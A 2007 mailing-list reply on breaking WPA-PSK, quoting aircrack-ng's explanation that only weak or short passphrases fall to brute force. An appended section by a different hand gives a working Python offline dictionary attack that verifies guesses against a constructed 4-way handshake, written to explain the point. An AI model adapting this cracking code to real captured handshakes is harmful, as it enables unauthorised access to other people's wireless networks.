On Monday 19 November 2007 05:55:07 pm Mark D. Foster wrote:
> Josh Paetzel wrote:
> > When I looked into this it seemed that the current state of affairs is
> > that WPA can only be broken by brute-forcing the key. I don't recall if
> > that could be done 'off-line' or not. My memory is that the needed info
> > to attempt bruteforcing could be obtained by simply receiving....no need
> > to attempt to associate to the AP. I'm not really interested in
> > disseminating links to tools that can be used to break wireless security,
> > but simple google searches will give you the info you need.....and the
> > tools are in the ports tree for the most part.
> >
> > Fortunately WPA allows keys that put even resource-rich attackers into
> > the decade range to bruteforce.
>
> That would not appear to be a limitation of aircrack-ng
> http://www.freshports.org/net-mgmt/aircrack-ng/
>
> aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can
> recover these keys once enough encrypted packets have been captured.
> It implements the standard FMS attack along with some optimizations
> like KoreK attacks, thus making the attack much faster compared to
> other WEP cracking tools. In fact aircrack is a set of tools for
> auditing wireless networks.
>
> That said, I haven't (yet) tried it myself ;)

Well, if you were to read your own link for a bit you'd eventually find...

http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Quoting from the page....

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is because the key is not static, so collecting IVs like when cracking WEP encryption does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true.

Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key. The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.

-- 
Thanks,
Josh Paetzel
PGP: 8A48 EF36 5E9F 4EDA 5A8C 11B4 26F9 01F1 27AF AECB
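The two points the quoted aircrack-ng page makes (the handshake alone gives the attacker everything, and each guess still costs a full PBKDF2 run, so only weak passphrases fall) are easier to see in code. The following is an added example for this thread, not code from either poster or from aircrack-ng. It implements the WPA2-PSK offline check in plain Python: PBKDF2-HMAC-SHA1 from passphrase and SSID to the PMK, the 802.11i PRF-512 from PMK, both MAC addresses and both nonces to the PTK, and the HMAC-SHA1 MIC over EAPOL message 2 that a candidate must reproduce. The "capture" is constructed inside the file, and the SSID, MAC addresses, nonces and passphrases are made up; it covers the WPA2/CCMP case (key descriptor version 2, HMAC-SHA1 MIC), whereas original WPA/TKIP frames use an HMAC-MD5 MIC instead.

```python
"""Offline WPA2-PSK dictionary attack against a captured 4-way handshake.

Added example for this mailing-list thread; not code from the posters or from
aircrack-ng. The handshake is constructed below, and the SSID, MAC addresses,
nonces and passphrases are made up for the demonstration.
"""
import hashlib
import hmac
import time

PBKDF2_ROUNDS = 4096                   # fixed by IEEE 802.11i for passphrase-derived PSKs
PTK_LABEL = b"Pairwise key expansion"  # PRF label from IEEE 802.11i
MIC_OFFSET = 81                        # EAPOL header (4) + key descriptor fields before the MIC
# Made-up 63-character random passphrase, the kind the quoted page recommends.
STRONG_PASSPHRASE = b"x7$Kq2!vLm9#Zp4&Rt6^Wn1*Yb8(Hd3)Jg5-Fs0+Cu2=Ea7_Oi4~Ql9<Vz3>Bx6"


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, PBKDF2_ROUNDS, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    return b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )[:64]


def derive_kck(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """First 16 bytes of the PTK: the Key Confirmation Key that keys the EAPOL MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, PTK_LABEL, data)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2/CCMP MIC: HMAC-SHA1 over the frame with its MIC field zeroed, cut to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) of a WPA2 4-way handshake."""
    rsn_ie = bytes.fromhex("3014 0100 000fac04 0100 000fac04 0100 000fac02 0000")
    body = (b"\x02"                   # descriptor type: RSN key
            + b"\x01\x0a"             # key info: pairwise, MIC present, descriptor version 2
            + b"\x00\x00"             # key length
            + (1).to_bytes(8, "big")  # replay counter
            + snonce                  # key nonce: the client's SNonce
            + b"\x00" * 16            # key IV
            + b"\x00" * 8             # key RSC
            + b"\x00" * 8             # key ID
            + mic                     # key MIC, 16 bytes at frame offset 81
            + len(rsn_ie).to_bytes(2, "big")
            + rsn_ie)                 # key data: the client's RSN IE
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type EAPOL-Key


def make_constructed_capture(passphrase: bytes) -> dict:
    """Stand in for a real AP and client so the attack has a handshake to work on."""
    cap = {
        "ssid": b"ExampleNet",                               # made up
        "ap_mac": bytes.fromhex("001122334455"),             # made up
        "sta_mac": bytes.fromhex("66778899aabb"),            # made up
        "anonce": hashlib.sha256(b"constructed anonce").digest(),
        "snonce": hashlib.sha256(b"constructed snonce").digest(),
    }
    kck = derive_kck(pmk_from_passphrase(passphrase, cap["ssid"]), cap["ap_mac"],
                     cap["sta_mac"], cap["anonce"], cap["snonce"])
    unsigned = build_msg2(cap["snonce"], b"\x00" * 16)
    cap["eapol_msg2"] = build_msg2(cap["snonce"], eapol_mic(kck, unsigned))
    return cap


def check_candidate(passphrase: bytes, cap: dict) -> bool:
    """One guess: passphrase -> PMK -> KCK, recompute the MIC, compare with the captured one.
    Everything read from cap is passively observable; the attacker never associates."""
    kck = derive_kck(pmk_from_passphrase(passphrase, cap["ssid"]), cap["ap_mac"],
                     cap["sta_mac"], cap["anonce"], cap["snonce"])
    captured_mic = cap["eapol_msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, cap["eapol_msg2"]), captured_mic)


def dictionary_attack(cap: dict, wordlist):
    """Return the first passphrase in wordlist that verifies against the capture, else None."""
    for word in wordlist:
        if check_candidate(word, cap):
            return word
    return None


if __name__ == "__main__":
    wordlist = [b"password", b"letmein1", b"sunshine1", b"qwerty12"]  # constructed
    weak = make_constructed_capture(b"sunshine1")
    print("weak passphrase recovered:", dictionary_attack(weak, wordlist))
    strong = make_constructed_capture(STRONG_PASSPHRASE)
    print("63-char random passphrase recovered:", dictionary_attack(strong, wordlist))
    t0 = time.perf_counter()
    for word in wordlist * 25:
        check_candidate(word, weak)
    print(f"pure-Python rate: {100 / (time.perf_counter() - t0):.0f} guesses/s, "
          f"each guess paying {PBKDF2_ROUNDS} PBKDF2 rounds")
```

The MIC comparison is the whole attack: no traffic beyond the two handshake nonces and one MIC'd EAPOL frame is needed, which is why receiving is enough, and nothing in it can be amortised across guesses the way WEP's statistical attacks amortise IVs, which is why a passphrase outside the candidate list is not recovered no matter how many packets are collected. Any WPA-PSK cracker performs this same check; the difference between this script and a real tool is only how fast the PBKDF2 step runs.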